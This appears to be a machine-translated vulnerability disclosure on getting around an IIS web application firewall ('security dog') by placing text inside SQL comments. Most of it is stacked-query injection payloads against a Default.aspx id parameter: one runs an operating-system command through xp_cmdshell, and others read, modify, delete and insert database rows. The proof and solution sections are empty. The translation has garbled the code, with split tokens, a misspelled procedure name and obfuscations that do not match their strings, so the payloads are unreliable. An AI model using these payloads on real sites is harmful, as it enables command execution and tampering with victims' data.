Attackers can execute arbitrary SQL statements by bypassing the latest website security dog (IIS) protection rules.
Attackers can execute arbitrary SQL statements by bypassing protection rules...
Detailed description:
There are still many websites with SQL injection, and there is no interception in the code.
We construct an SQL injection. In this case, the dongle intercepts the injection.
/Default. aspx? Id = 481942; DECLARE/**/@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''dir''; EXEC (@ s)
Here is the time to witness the miracle! Add any characters in the middle of/**/, such as/* 1...
/Default. aspx? Id = 481942; DECLARE/* 1 */@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''' dir''; EXEC (@ s)
In this case, you can add, delete, query, and modify the content.
-- Execute Command
/Default. aspx? Id = 481942; DECLARE/* 1 */@ s VARCHAR (2000); SET @ s = 'xp _ javasshell ''' dir''; EXEC (@ s)
-- Query
/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = replace ('select * fxxxm Online_tj ', 'xxx', 'ro '); EXEC (@ s )--
-- Modify
/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = 'Update Online_tj xxxt logtime = 1 where id = 1'; EXEC (@ s )--
-- Delete
/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = replace ('delete Online_tj where id = 1', 'xxx ', 'se'); EXEC (@ s )--
-- Add
/Default. aspx? Id = 481942; DECLARE/* 2 */@ s VARCHAR (2000); SET @ s = 'insert Online_tj values ('000000') '; EXEC (@ s )--
Proof of vulnerability:
Solution:
You are more professional than me!